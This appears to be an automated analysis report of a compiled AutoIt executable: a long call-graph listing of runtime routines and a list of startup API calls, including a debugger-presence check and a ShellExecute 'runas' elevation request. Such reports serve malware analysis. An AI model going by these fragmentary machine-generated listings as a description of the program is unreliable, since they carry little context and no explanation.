__lock_file 59 API calls 104972->104975 104983 c88b28 58 API calls __getptd_noexit 104973->104983 104974->104969 104977 c85652 104975->104977 104985 c8541d 72 API calls 6 library calls 104977->104985 104978 c85639 104984 c88db6 9 API calls __beginthread 104978->104984 104981 c85668 104986 c85686 LeaveCriticalSection LeaveCriticalSection _fprintf 104981->104986 104983->104978 104984->104974 104985->104981 104986->104974 104990 c8520a GetSystemTimeAsFileTime 104987->104990 104989 cc8f6e 104989->104758 104991 c85238 __aulldiv 104990->104991 104991->104989 104993 c85c6c __freefls@4 104992->104993 104994 c85c7e 104993->104994 104995 c85c93 104993->104995 105006 c88b28 58 API calls __getptd_noexit 104994->105006 104997 c86c11 __lock_file 59 API calls 104995->104997 104999 c85c99 104997->104999 104998 c85c83 105007 c88db6 9 API calls __beginthread 104998->105007 105008 c858d0 67 API calls 6 library calls 104999->105008 105002 c85c8e __freefls@4 105002->104763 105003 c85ca4 105009 c85cc4 LeaveCriticalSection LeaveCriticalSection _fprintf 105003->105009 105005 c85cb6 105005->105002 105006->104998 105007->105002 105008->105003 105009->105005 105010->104645 105011->104658 105012->104660 105013->104657 105014->104665 105020 cc9748 __tzset_nolock _wcscmp 105015->105020 105016 c64f0b 74 API calls 105016->105020 105017 cc95dc 105017->104676 105017->104677 105018 cc9109 GetSystemTimeAsFileTime 105018->105020 105019 c64ee5 85 API calls 105019->105020 105020->105016 105020->105017 105020->105018 105020->105019 105021->104703 105023 c853b2 __freefls@4 105022->105023 105024 c853de 105023->105024 105025 c853c6 105023->105025 105028 c86c11 __lock_file 59 API calls 105024->105028 105034 c853d6 __freefls@4 105024->105034 105051 c88b28 58 API calls __getptd_noexit 105025->105051 105027 c853cb 105052 c88db6 9 API calls __beginthread 105027->105052 105030 c853f0 105028->105030 105035 c8533a 105030->105035 105034->104708 105036 c85349 105035->105036 105039 c8535d 105035->105039 105097 c88b28 58 API calls __getptd_noexit 105036->105097 105038 c85359 105053 c85415 LeaveCriticalSection LeaveCriticalSection _fprintf 105038->105053 105039->105038 105054 c84a3d 105039->105054 105040 c8534e 105098 c88db6 9 API calls __beginthread 105040->105098 105047 c85377 105071 c90a02 105047->105071 105049 c8537d 105049->105038 105050 c82d55 _free 58 API calls 105049->105050 105050->105038 105051->105027 105052->105034 105053->105034 105055 c84a50 105054->105055 105059 c84a74 105054->105059 105056 c846e6 __flswbuf 58 API calls 105055->105056 105055->105059 105057 c84a6d 105056->105057 105099 c8d886 105057->105099 105060 c90b77 105059->105060 105061 c85371 105060->105061 105062 c90b84 105060->105062 105064 c846e6 105061->105064 105062->105061 105063 c82d55 _free 58 API calls 105062->105063 105063->105061 105065 c846f0 105064->105065 105066 c84705 105064->105066 105234 c88b28 58 API calls __getptd_noexit 105065->105234 105066->105047 105068 c846f5 105235 c88db6 9 API calls __beginthread 105068->105235 105070 c84700 105070->105047 105072 c90a0e __freefls@4 105071->105072 105073 c90a1b 105072->105073 105074 c90a32 105072->105074 105251 c88af4 58 API calls __getptd_noexit 105073->105251 105076 c90abd 105074->105076 105078 c90a42 105074->105078 105256 c88af4 58 API calls __getptd_noexit 105076->105256 105077 c90a20 105252 c88b28 58 API calls __getptd_noexit 105077->105252 105081 c90a6a 105078->105081 105082 c90a60 105078->105082 105085 c8d206 ___lock_fhandle 59 API calls 105081->105085 105253 c88af4 58 API calls __getptd_noexit 105082->105253 105083 c90a65 105257 c88b28 58 API calls __getptd_noexit 105083->105257 105087 c90a70 105085->105087 105089 c90a8e 105087->105089 105090 c90a83 105087->105090 105088 c90ac9 105258 c88db6 9 API calls __beginthread 105088->105258 105254 c88b28 58 API calls __getptd_noexit 105089->105254 105236 c90add 105090->105236 105091 c90a27 __freefls@4 105091->105049 105095 c90a89 105255 c90ab5 LeaveCriticalSection __unlock_fhandle 105095->105255 105097->105040 105098->105038 105100 c8d892 __freefls@4 105099->105100 105101 c8d89f 105100->105101 105102 c8d8b6 105100->105102 105200 c88af4 58 API calls __getptd_noexit 105101->105200 105104 c8d955 105102->105104 105106 c8d8ca 105102->105106 105206 c88af4 58 API calls __getptd_noexit 105104->105206 105105 c8d8a4 105201 c88b28 58 API calls __getptd_noexit 105105->105201 105109 c8d8e8 105106->105109 105110 c8d8f2 105106->105110 105202 c88af4 58 API calls __getptd_noexit 105109->105202 105127 c8d206 105110->105127 105111 c8d8ed 105207 c88b28 58 API calls __getptd_noexit 105111->105207 105114 c8d8f8 105116 c8d90b 105114->105116 105117 c8d91e 105114->105117 105136 c8d975 105116->105136 105203 c88b28 58 API calls __getptd_noexit 105117->105203 105118 c8d961 105208 c88db6 9 API calls __beginthread 105118->105208 105121 c8d8ab __freefls@4 105121->105059 105123 c8d917 105205 c8d94d LeaveCriticalSection __unlock_fhandle 105123->105205 105124 c8d923 105204 c88af4 58 API calls __getptd_noexit 105124->105204 105128 c8d212 __freefls@4 105127->105128 105129 c8d261 EnterCriticalSection 105128->105129 105130 c89c0b __lock 58 API calls 105128->105130 105131 c8d287 __freefls@4 105129->105131 105132 c8d237 105130->105132 105131->105114 105133 c8d24f 105132->105133 105209 c89e2b InitializeCriticalSectionAndSpinCount 105132->105209 105210 c8d28b LeaveCriticalSection _doexit 105133->105210 105137 c8d982 __ftell_nolock 105136->105137 105138 c8d9c1 105137->105138 105139 c8d9e0 105137->105139 105169 c8d9b6 105137->105169 105220 c88af4 58 API calls __getptd_noexit 105138->105220 105142 c8da38 105139->105142 105143 c8da1c 105139->105143 105140 c8c5f6 __fltin2 6 API calls 105144 c8e1d6 105140->105144 105147 c8da51 105142->105147 105226 c918c1 60 API calls 3 library calls 105142->105226 105223 c88af4 58 API calls __getptd_noexit 105143->105223 105144->105123 105145 c8d9c6 105221 c88b28 58 API calls __getptd_noexit 105145->105221 105211 c95c6b 105147->105211 105150 c8da21 105224 c88b28 58 API calls __getptd_noexit 105150->105224 105152 c8d9cd 105222 c88db6 9 API calls __beginthread 105152->105222 105154 c8da5f 105156 c8ddb8 105154->105156 105227 c899ac 58 API calls 2 library calls 105154->105227 105158 c8e14b WriteFile 105156->105158 105159 c8ddd6 105156->105159 105157 c8da28 105225 c88db6 9 API calls __beginthread 105157->105225 105162 c8ddab GetLastError 105158->105162 105168 c8dd78 105158->105168 105163 c8defa 105159->105163 105172 c8ddec 105159->105172 105162->105168 105175 c8dfef 105163->105175 105177 c8df05 105163->105177 105164 c8da8b GetConsoleMode 105164->105156 105166 c8daca 105164->105166 105165 c8e184 105165->105169 105232 c88b28 58 API calls __getptd_noexit 105165->105232 105166->105156 105170 c8dada GetConsoleCP 105166->105170 105168->105165 105168->105169 105174 c8ded8 105168->105174 105169->105140 105170->105165 105196 c8db09 105170->105196 105171 c8de5b WriteFile 105171->105162 105176 c8de98 105171->105176 105172->105165 105172->105171 105173 c8e1b2 105233 c88af4 58 API calls __getptd_noexit 105173->105233 105181 c8e17b 105174->105181 105182 c8dee3 105174->105182 105175->105165 105183 c8e064 WideCharToMultiByte 105175->105183 105176->105172 105178 c8debc 105176->105178 105177->105165 105179 c8df6a WriteFile 105177->105179 105178->105168 105179->105162 105184 c8dfb9 105179->105184 105231 c88b07 58 API calls 3 library calls 105181->105231 105229 c88b28 58 API calls __getptd_noexit 105182->105229 105183->105162 105192 c8e0ab 105183->105192 105184->105168 105184->105177 105184->105178 105187 c8e0b3 WriteFile 105190 c8e106 GetLastError 105187->105190 105187->105192 105188 c8dee8 105230 c88af4 58 API calls __getptd_noexit 105188->105230 105190->105192 105192->105168 105192->105175 105192->105178 105192->105187 105193 c962ba 60 API calls __write_nolock 105193->105196 105194 c8dbf2 WideCharToMultiByte 105194->105168 105195 c8dc2d WriteFile 105194->105195 105195->105162 105198 c8dc5f 105195->105198 105196->105168 105196->105193 105196->105194 105196->105198 105228 c835f5 58 API calls __isleadbyte_l 105196->105228 105197 c97a5e WriteConsoleW CreateFileW __putwch_nolock 105197->105198 105198->105162 105198->105168 105198->105196 105198->105197 105199 c8dc87 WriteFile 105198->105199 105199->105162 105199->105198 105200->105105 105201->105121 105202->105111 105203->105124 105204->105123 105205->105121 105206->105111 105207->105118 105208->105121 105209->105133 105210->105129 105212 c95c83 105211->105212 105213 c95c76 105211->105213 105216 c95c8f 105212->105216 105217 c88b28 __beginthread 58 API calls 105212->105217 105214 c88b28 __beginthread 58 API calls 105213->105214 105215 c95c7b 105214->105215 105215->105154 105216->105154 105218 c95cb0 105217->105218 105219 c88db6 __beginthread 9 API calls 105218->105219 105219->105215 105220->105145 105221->105152 105222->105169 105223->105150 105224->105157 105225->105169 105226->105147 105227->105164 105228->105196 105229->105188 105230->105169 105231->105169 105232->105173 105233->105169 105234->105068 105235->105070 105259 c8d4c3 105236->105259 105238 c90b41 105272 c8d43d 59 API calls 2 library calls 105238->105272 105239 c90aeb 105239->105238 105241 c8d4c3 __lseek_nolock 58 API calls 105239->105241 105250 c90b1f 105239->105250 105244 c90b16 105241->105244 105242 c8d4c3 __lseek_nolock 58 API calls 105245 c90b2b CloseHandle 105242->105245 105243 c90b49 105249 c90b6b 105243->105249 105273 c88b07 58 API calls 3 library calls 105243->105273 105247 c8d4c3 __lseek_nolock 58 API calls 105244->105247 105245->105238 105248 c90b37 GetLastError 105245->105248 105247->105250 105248->105238 105249->105095 105250->105238 105250->105242 105251->105077 105252->105091 105253->105083 105254->105095 105255->105091 105256->105083 105257->105088 105258->105091 105260 c8d4ce 105259->105260 105261 c8d4e3 105259->105261 105274 c88af4 58 API calls __getptd_noexit 105260->105274 105265 c8d508 105261->105265 105276 c88af4 58 API calls __getptd_noexit 105261->105276 105264 c8d4d3 105275 c88b28 58 API calls __getptd_noexit 105264->105275 105265->105239 105266 c8d512 105277 c88b28 58 API calls __getptd_noexit 105266->105277 105268 c8d4db 105268->105239 105270 c8d51a 105278 c88db6 9 API calls __beginthread 105270->105278 105272->105243 105273->105249 105274->105264 105275->105268 105276->105266 105277->105270 105278->105268 105280 c91940 __ftell_nolock 105279->105280 105281 c8079e GetLongPathNameW 105280->105281 105282 c67bcc 59 API calls 105281->105282 105283 c672bd 105282->105283 105284 c6700b 105283->105284 105285 c67667 59 API calls 105284->105285 105286 c6701d 105285->105286 105287 c64750 60 API calls 105286->105287 105288 c67028 105287->105288 105289 c67033 105288->105289 105290 c9e885 105288->105290 105291 c63f74 59 API calls 105289->105291 105295 c9e89f 105290->105295 105337 c67908 61 API calls 105290->105337 105293 c6703f 105291->105293 105331 c634c2 105293->105331 105296 c67052 Mailbox 105296->104494 105298 c64ddd 136 API calls 105297->105298 105299 c6688f 105298->105299 105300 c9e031 105299->105300 105302 c64ddd 136 API calls 105299->105302 105301 cc955b 122 API calls 105300->105301 105303 c9e046 105301->105303 105304 c668a3 105302->105304 105305 c9e04a 105303->105305 105306 c9e067 105303->105306 105304->105300 105307 c668ab 105304->105307 105310 c64e4a 84 API calls 105305->105310 105311 c80db6 Mailbox 59 API calls 105306->105311 105308 c668b7 105307->105308 105309 c9e052 105307->105309 105338 c66a8c 105308->105338 105445 cc42f8 90 API calls _wprintf 105309->105445 105310->105309 105320 c9e0ac Mailbox 105311->105320 105315 c9e060 105315->105306 105316 c9e260 105317 c82d55 _free 58 API calls 105316->105317 105318 c9e268 105317->105318 105319 c64e4a 84 API calls 105318->105319 105325 c9e271 105319->105325 105320->105316 105320->105325 105328 c67de1 59 API calls 105320->105328 105431 c6750f 105320->105431 105439 c6735d 105320->105439 105446 cbf73d 59 API calls 2 library calls 105320->105446 105447 cbf65e 61 API calls 2 library calls 105320->105447 105448 cc737f 59 API calls Mailbox 105320->105448 105324 c82d55 _free 58 API calls 105324->105325 105325->105324 105326 c64e4a 84 API calls 105325->105326 105449 cbf7a1 89 API calls 4 library calls 105325->105449 105326->105325 105328->105320 105332 c634d4 105331->105332 105336 c634f3 _memmove 105331->105336 105335 c80db6 Mailbox 59 API calls 105332->105335 105333 c80db6 Mailbox 59 API calls 105334 c6350a 105333->105334 105334->105296 105335->105336 105336->105333 105337->105290 105339 c66ab5 105338->105339 105340 c9e41e 105338->105340 105455 c657a6 60 API calls Mailbox 105339->105455 105522 cbf7a1 89 API calls 4 library calls 105340->105522 105343 c66ad7 105456 c657f6 67 API calls 105343->105456 105344 c9e431 105523 cbf7a1 89 API calls 4 library calls 105344->105523 105346 c66aec 105346->105344 105347 c66af4 105346->105347 105349 c67667 59 API calls 105347->105349 105351 c66b00 105349->105351 105350 c9e44d 105352 c66b61 105350->105352 105457 c80957 60 API calls __ftell_nolock 105351->105457 105354 c66b6f 105352->105354 105355 c9e460 105352->105355 105358 c67667 59 API calls 105354->105358 105357 c65c6f CloseHandle 105355->105357 105356 c66b0c 105359 c67667 59 API calls 105356->105359 105360 c9e46c 105357->105360 105361 c66b78 105358->105361 105362 c66b18 105359->105362 105363 c64ddd 136 API calls 105360->105363 105364 c67667 59 API calls 105361->105364 105365 c64750 60 API calls 105362->105365 105367 c9e488 105363->105367 105368 c66b81 105364->105368 105366 c66b26 105365->105366 105458 c65850 ReadFile SetFilePointerEx 105366->105458 105370 c9e4b1 105367->105370 105373 cc955b 122 API calls 105367->105373 105460 c6459b 105368->105460 105524 cbf7a1 89 API calls 4 library calls 105370->105524 105372 c66b52 105459 c65aee SetFilePointerEx SetFilePointerEx 105372->105459 105377 c9e4a4 105373->105377 105374 c66b98 105378 c67b2e 59 API calls 105374->105378 105380 c9e4cd 105377->105380 105381 c9e4ac 105377->105381 105382 c66ba9 SetCurrentDirectoryW 105378->105382 105379 c9e4c8 105409 c66d0c Mailbox 105379->105409 105383 c64e4a 84 API calls 105380->105383 105384 c64e4a 84 API calls 105381->105384 105387 c66bbc Mailbox 105382->105387 105385 c9e4d2 105383->105385 105384->105370 105386 c80db6 Mailbox 59 API calls 105385->105386 105393 c9e506 105386->105393 105389 c80db6 Mailbox 59 API calls 105387->105389 105391 c66bcf 105389->105391 105390 c63bbb 105390->104361 105390->104384 105392 c6522e 59 API calls 105391->105392 105420 c66bda Mailbox __NMSG_WRITE 105392->105420 105394 c6750f 59 API calls 105393->105394 105426 c9e54f Mailbox 105394->105426 105395 c66ce7 105518 c65c6f 105395->105518 105398 c9e740 105529 cc72df 59 API calls Mailbox 105398->105529 105402 c9e762 105530 cdfbce 59 API calls 2 library calls 105402->105530 105405 c9e76f 105406 c82d55 _free 58 API calls 105405->105406 105406->105409 105407 c9e7d9 105533 cbf7a1 89 API calls 4 library calls 105407->105533 105450 c657d4 105409->105450 105411 c6750f 59 API calls 105411->105426 105412 c9e7f2 105412->105395 105414 c9e7d1 105532 cbf5f7 59 API calls 4 library calls 105414->105532 105417 c67de1 59 API calls 105417->105420 105420->105395 105420->105407 105420->105414 105420->105417 105511 c6586d 67 API calls _wcscpy 105420->105511 105512 c66f5d GetStringTypeW 105420->105512 105513 c66ecc 60 API calls __wcsnicmp 105420->105513 105514 c66faa GetStringTypeW __NMSG_WRITE 105420->105514 105515 c8363d GetStringTypeW _iswctype 105420->105515 105516 c668dc 165 API calls 3 library calls 105420->105516 105517 c67213 59 API calls Mailbox 105420->105517 105421 c67de1 59 API calls 105421->105426 105425 c9e792 105531 cbf7a1 89 API calls 4 library calls 105425->105531 105426->105398 105426->105411 105426->105421 105426->105425 105525 cbf73d 59 API calls 2 library calls 105426->105525 105526 cbf65e 61 API calls 2 library calls 105426->105526 105527 cc737f 59 API calls Mailbox 105426->105527 105528 c67213 59 API calls Mailbox 105426->105528 105428 c9e7ab 105429 c82d55 _free 58 API calls 105428->105429 105430 c9e7be 105429->105430 105430->105409 105432 c675af 105431->105432 105435 c67522 _memmove 105431->105435 105434 c80db6 Mailbox 59 API calls 105432->105434 105433 c80db6 Mailbox 59 API calls 105436 c67529 105433->105436 105434->105435 105435->105433 105437 c80db6 Mailbox 59 API calls 105436->105437 105438 c67552 105436->105438 105437->105438 105438->105320 105440 c67370 105439->105440 105443 c6741e 105439->105443 105441 c80db6 Mailbox 59 API calls 105440->105441 105444 c673a2 105440->105444 105441->105444 105442 c80db6 59 API calls Mailbox 105442->105444 105443->105320 105444->105442 105444->105443 105445->105315 105446->105320 105447->105320 105448->105320 105449->105325 105451 c65c6f CloseHandle 105450->105451 105452 c657dc Mailbox 105451->105452 105453 c65c6f CloseHandle 105452->105453 105454 c657eb 105453->105454 105454->105390 105455->105343 105456->105346 105457->105356 105458->105372 105459->105352 105461 c67667 59 API calls 105460->105461 105462 c645b1 105461->105462 105463 c67667 59 API calls 105462->105463 105464 c645b9 105463->105464 105465 c67667 59 API calls 105464->105465 105466 c645c1 105465->105466 105467 c67667 59 API calls 105466->105467 105468 c645c9 105467->105468 105469 c9d4d2 105468->105469 105470 c645fd 105468->105470 105471 c68047 59 API calls 105469->105471 105472 c6784b 59 API calls 105470->105472 105473 c9d4db 105471->105473 105474 c6460b 105472->105474 105475 c67d8c 59 API calls 105473->105475 105476 c67d2c 59 API calls 105474->105476 105478 c64640 105475->105478 105477 c64615 105476->105477 105477->105478 105479 c6784b 59 API calls 105477->105479 105480 c64680 105478->105480 105482 c6465f 105478->105482 105493 c9d4fb 105478->105493 105483 c64636 105479->105483 105481 c6784b 59 API calls 105480->105481 105485 c64691 105481->105485 105484 c679f2 59 API calls 105482->105484 105487 c67d2c 59 API calls 105483->105487 105488 c64669 105484->105488 105489 c646a3 105485->105489 105491 c68047 59 API calls 105485->105491 105486 c9d5cb 105490 c67bcc 59 API calls 105486->105490 105487->105478 105488->105480 105494 c6784b 59 API calls 105488->105494 105492 c646b3 105489->105492 105495 c68047 59 API calls 105489->105495 105500 c9d588 105490->105500 105491->105489 105497 c646ba 105492->105497 105498 c68047 59 API calls 105492->105498 105493->105486 105496 c9d5b4 105493->105496 105508 c9d532 105493->105508 105494->105480 105495->105492 105496->105486 105503 c9d59f 105496->105503 105499 c68047 59 API calls 105497->105499 105507 c646c1 Mailbox 105497->105507 105498->105497 105499->105507 105500->105480 105501 c679f2 59 API calls 105500->105501 105534 c67924 59 API calls 2 library calls 105500->105534 105501->105500 105502 c9d590 105504 c67bcc 59 API calls 105502->105504 105505 c67bcc 59 API calls 105503->105505 105504->105500 105505->105500 105507->105374 105508->105502 105509 c9d57b 105508->105509 105510 c67bcc 59 API calls 105509->105510 105510->105500 105511->105420 105512->105420 105513->105420 105514->105420 105515->105420 105516->105420 105517->105420 105519 c65c88 105518->105519 105520 c65c79 SetCurrentDirectoryW 105518->105520 105519->105520 105521 c65c8d CloseHandle 105519->105521 105520->105409 105521->105520 105522->105344 105523->105350 105524->105379 105525->105426 105526->105426 105527->105426 105528->105426 105529->105402 105530->105405 105531->105428 105532->105407 105533->105412 105534->105500 105536 c66d95 105535->105536 105537 c66ea9 105535->105537 105536->105537 105538 c80db6 Mailbox 59 API calls 105536->105538 105537->104500 105540 c66dbc 105538->105540 105539 c80db6 Mailbox 59 API calls 105545 c66e31 105539->105545 105540->105539 105543 c6735d 59 API calls 105543->105545 105544 c6750f 59 API calls 105544->105545 105545->105537 105545->105543 105545->105544 105548 c66240 105545->105548 105573 cb6553 59 API calls Mailbox 105545->105573 105546->104502 105547->104504 105549 c67a16 59 API calls 105548->105549 105567 c66265 105549->105567 105550 c6646a 105551 c6750f 59 API calls 105550->105551 105552 c66484 Mailbox 105551->105552 105552->105545 105555 c9dff6 105578 cbf8aa 91 API calls 4 library calls 105555->105578 105559 c6750f 59 API calls 105559->105567 105560 c9e004 105562 c6750f 59 API calls 105560->105562 105561 c67d8c 59 API calls 105561->105567 105563 c9e01a 105562->105563 105563->105552 105564 c66799 _memmove 105579 cbf8aa 91 API calls 4 library calls 105564->105579 105565 c9df92 105566 c68029 59 API calls 105565->105566 105568 c9df9d 105566->105568 105567->105550 105567->105555 105567->105559 105567->105561 105567->105564 105567->105565 105570 c67e4f 59 API calls 105567->105570 105574 c65f6c 60 API calls 105567->105574 105575 c65d41 59 API calls Mailbox 105567->105575 105576 c65e72 60 API calls 105567->105576 105577 c67924 59 API calls 2 library calls 105567->105577 105572 c80db6 Mailbox 59 API calls 105568->105572 105571 c6643b CharUpperBuffW 105570->105571 105571->105567 105572->105564 105573->105545 105574->105567 105575->105567 105576->105567 105577->105567 105578->105560 105579->105552 105580->104519 105581->104518 105583 c6e6d5 105582->105583 105584 ca3aa9 105583->105584 105586 c6e73f 105583->105586 105597 c6e799 105583->105597 105585 c69ea0 341 API calls 105584->105585 105587 ca3abe 105585->105587 105590 c67667 59 API calls 105586->105590 105586->105597 105612 c6e970 Mailbox 105587->105612 105749 cc9e4a 89 API calls 4 library calls 105587->105749 105588 c67667 59 API calls 105588->105597 105592 ca3b04 105590->105592 105591 c82d40 __cinit 67 API calls 105591->105597 105594 c82d40 __cinit 67 API calls 105592->105594 105593 ca3b26 105593->104596 105594->105597 105595 c684c0 69 API calls 105595->105612 105596 c69ea0 341 API calls 105596->105612 105597->105588 105597->105591 105597->105593 105598 c6e95a 105597->105598 105597->105612 105598->105612 105750 cc9e4a 89 API calls 4 library calls 105598->105750 105600 c68d40 59 API calls 105600->105612 105601 c69c90 Mailbox 59 API calls 105601->105612 105608 ca3e25 105608->104596 105609 cc9e4a 89 API calls 105609->105612 105610 c6f195 105754 cc9e4a 89 API calls 4 library calls 105610->105754 105611 c6ea78 105611->104596 105612->105595 105612->105596 105612->105600 105612->105601 105612->105609 105612->105610 105612->105611 105748 c67f77 59 API calls 2 library calls 105612->105748 105751 cb6e8f 59 API calls 105612->105751 105752 cdc5c3 341 API calls 105612->105752 105753 cdb53c 341 API calls Mailbox 105612->105753 105755 cd93c6 341 API calls Mailbox 105612->105755 105614 c6f650 105613->105614 105615 c6f4ba 105613->105615 105618 c67de1 59 API calls 105614->105618 105616 c6f4c6 105615->105616 105617 ca441e 105615->105617 105851 c6f290 341 API calls 2 library calls 105616->105851 105852 cdbc6b 341 API calls Mailbox 105617->105852 105624 c6f58c Mailbox 105618->105624 105621 ca442c 105625 c6f630 105621->105625 105853 cc9e4a 89 API calls 4 library calls 105621->105853 105623 c6f4fd 105623->105621 105623->105624 105623->105625 105632 c64e4a 84 API calls 105624->105632 105756 cccb7a 105624->105756 105836 cc3c37 105624->105836 105839 cddf37 105624->105839 105842 cd445a 105624->105842 105625->104596 105626 c69c90 Mailbox 59 API calls 105627 c6f5e3 105626->105627 105627->105625 105627->105626 105632->105627 105634 c63212 105633->105634 105635 c631e0 105633->105635 105634->104596 105635->105634 105636 c63205 IsDialogMessageW 105635->105636 105637 c9cf32 GetClassLongW 105635->105637 105636->105634 105636->105635 105637->105635 105637->105636 105638->104596 106011 c68180 105639->106011 105641 c6fd3d 105643 ca472d 105641->105643 105705 c706f6 105641->105705 106016 c6f234 105641->106016 106030 cc9e4a 89 API calls 4 library calls 105643->106030 105646 ca4742 105647 ca488d 105647->105646 105653 c6fe4c 105647->105653 106036 cda2d9 85 API calls Mailbox 105647->106036 105648 c70517 105659 c80db6 Mailbox 59 API calls 105648->105659 105649 ca4b53 105649->105646 106051 cc9e4a 89 API calls 4 library calls 105649->106051 105650 c6fe3e 105650->105647 105650->105653 106034 cb66ec 59 API calls 2 library calls 105650->106034 105652 c80db6 59 API calls Mailbox 105681 c6fdd3 105652->105681 105653->105649 105660 ca48f9 105653->105660 106020 c6837c 105653->106020 105654 ca47d7 105654->105646 106032 cc9e4a 89 API calls 4 library calls 105654->106032 105656 ca4848 106035 cb60ef 59 API calls 2 library calls 105656->106035 105667 c70545 _memmove 105659->105667 105668 ca4917 105660->105668 106038 c685c0 105660->106038 105662 ca4755 105662->105654 106031 c6f6a3 341 API calls 105662->106031 105665 ca48b2 Mailbox 105665->105653 106037 cb66ec 59 API calls 2 library calls 105665->106037 105674 c80db6 Mailbox 59 API calls 105667->105674 105673 ca4928 105668->105673 105676 c685c0 59 API calls 105668->105676 105670 ca486b 105697 c70179 Mailbox _memmove 105673->105697 105685 c70106 _memmove 105674->105685 105676->105673 105681->105646 105681->105648 105681->105650 105681->105652 105681->105662 105681->105667 105684 c69ea0 341 API calls 105681->105684 105694 ca480c 105681->105694 105684->105681 105685->105697 105700 c69c90 Mailbox 59 API calls 105685->105700 105718 c70162 105685->105718 106033 cc9e4a 89 API calls 4 library calls 105694->106033 105695 ca4ab2 105697->105695 105701 c69d3c 60 API calls 105697->105701 105704 c70398 105697->105704 105697->105705 105708 c80db6 59 API calls Mailbox 105697->105708 105712 ca4a1c 105697->105712 105717 ca4a4d 105697->105717 106027 c68740 68 API calls __cinit 105697->106027 106028 c68660 68 API calls 105697->106028 106047 cc5937 68 API calls 105697->106047 106048 c689b3 69 API calls Mailbox 105697->106048 105700->105685 105701->105697 105704->104596 106029 cc9e4a 89 API calls 4 library calls 105705->106029 105708->105697 105718->104596 105719->104526 105720->104531 105721->104596 105722->104533 105723->104533 105724->104533 105725->104596 105726->104596 105727->104596 105728->104596 105729->104596 105731 c9eda1 105730->105731 105734 c682f2 105730->105734 105732 c9edb1 105731->105732 106054 cb61a4 59 API calls 105731->106054 105735 c6831c 105734->105735 105736 c685c0 59 API calls 105734->105736 105740 c68339 Mailbox 105734->105740 105737 c68322 105735->105737 105738 c685c0 59 API calls 105735->105738 105736->105735 105739 c69c90 Mailbox 59 API calls 105737->105739 105737->105740 105738->105737 105739->105740 105740->104596 105741->104580 105742->104580 105743->104580 105744->104580 105745->104580 105746->104580 105747->104580 105748->105612 105749->105612 105750->105612 105751->105612 105752->105612 105753->105612 105754->105608 105755->105612 105757 c67667 59 API calls 105756->105757 105758 cccbaf 105757->105758 105759 c67667 59 API calls 105758->105759 105760 cccbb8 105759->105760 105761 cccbcc 105760->105761 105963 c69b3c 59 API calls 105760->105963 105763 c69837 84 API calls 105761->105763 105764 cccbe9 105763->105764 105765 ccccea 105764->105765 105766 cccc0b 105764->105766 105778 cccd1a Mailbox 105764->105778 105768 c64ddd 136 API calls 105765->105768 105778->105627 106006 cc445a GetFileAttributesW 105836->106006 105840 cdcadd 130 API calls 105839->105840 105841 cddf47 105840->105841 105841->105627 105843 c69837 84 API calls 105842->105843 105844 cd4494 105843->105844 105845 c66240 94 API calls 105844->105845 105846 cd44a4 105845->105846 105847 cd44c9 105846->105847 105848 c69ea0 341 API calls 105846->105848 105850 cd44cd 105847->105850 106010 c69a98 59 API calls Mailbox 105847->106010 105848->105847 105850->105627 105851->105623 105852->105621 105853->105625 105963->105761 106007 cc3c3e 106006->106007 106008 cc4475 FindFirstFileW 106006->106008 106007->105627 106008->106007 106009 cc448a FindClose 106008->106009 106009->106007 106010->105850 106012 c6818f 106011->106012 106015 c681aa 106011->106015 106013 c67e4f 59 API calls 106012->106013 106014 c68197 CharUpperBuffW 106013->106014 106014->106015 106015->105641 106017 c6f251 106016->106017 106018 c6f272 106017->106018 106052 cc9e4a 89 API calls 4 library calls 106017->106052 106018->105681 106021 c9edbd 106020->106021 106022 c6838d 106020->106022 106023 c80db6 Mailbox 59 API calls 106022->106023 106027->105697 106028->105697 106029->105643 106030->105646 106031->105654 106032->105646 106033->105646 106034->105656 106035->105670 106036->105665 106037->105665 106039 c685ce 106038->106039 106045 c685f6 106038->106045 106045->105668 106047->105697 106048->105697 106051->105646 106052->106018 106054->105732 106055 c9fe27 106068 c7f944 106055->106068 106057 c9fe3d 106058 c9febe 106057->106058 106059 c9fe53 106057->106059 106064 c6fce0 341 API calls 106058->106064 106077 c69e5d 60 API calls 106059->106077 106061 c9fe92 106062 c9fe9a 106061->106062 106063 ca089c 106061->106063 106078 cc834f 59 API calls Mailbox 106062->106078 106079 cc9e4a 89 API calls 4 library calls 106063->106079 106067 c9feb2 Mailbox 106064->106067 106069 c7f962 106068->106069 106070 c7f950 106068->106070 106072 c7f991 106069->106072 106073 c7f968 106069->106073 106071 c69d3c 60 API calls 106070->106071 106076 c7f95a 106071->106076 106075 c69d3c 60 API calls 106072->106075 106074 c80db6 Mailbox 59 API calls 106073->106074 106074->106076 106075->106076 106076->106057 106077->106061 106078->106067 106079->106067

                                                          Control-flow Graph

                                                          APIs
                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C63B68
                                                          • IsDebuggerPresent.KERNEL32 ref: 00C63B7A
                                                          • GetFullPathNameW.KERNEL32(00007FFF,?,?,00D252F8,00D252E0,?,?), ref: 00C63BEB
                                                            • Part of subcall function 00C67BCC: _memmove.LIBCMT ref: 00C67C06
                                                            • Part of subcall function 00C7092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00C63C14,00D252F8,?,?,?), ref: 00C7096E
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00C63C6F
                                                          • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00D17770,00000010), ref: 00C9D281
                                                          • SetCurrentDirectoryW.KERNEL32(?,00D252F8,?,?,?), ref: 00C9D2B9
                                                          • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00D14260,00D252F8,?,?,?), ref: 00C9D33F
                                                          • ShellExecuteW.SHELL32(00000000,?,?), ref: 00C9D346
                                                            • Part of subcall function 00C63A46: GetSysColorBrush.USER32(0000000F), ref: 00C63A50
                                                            • Part of subcall function 00C63A46: LoadCursorW.USER32(00000000,00007F00), ref: 00C63A5F
                                                            • Part of subcall function 00C63A46: LoadIconW.USER32(00000063), ref: 00C63A76
                                                            • Part of subcall function 00C63A46: LoadIconW.USER32(000000A4), ref: 00C63A88
                                                            • Part of subcall function 00C63A46: LoadIconW.USER32(000000A2), ref: 00C63A9A
                                                            • Part of subcall function 00C63A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00C63AC0
                                                            • Part of subcall function 00C63A46: RegisterClassExW.USER32(?), ref: 00C63B16
                                                            • Part of subcall function 00C639D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C63A03
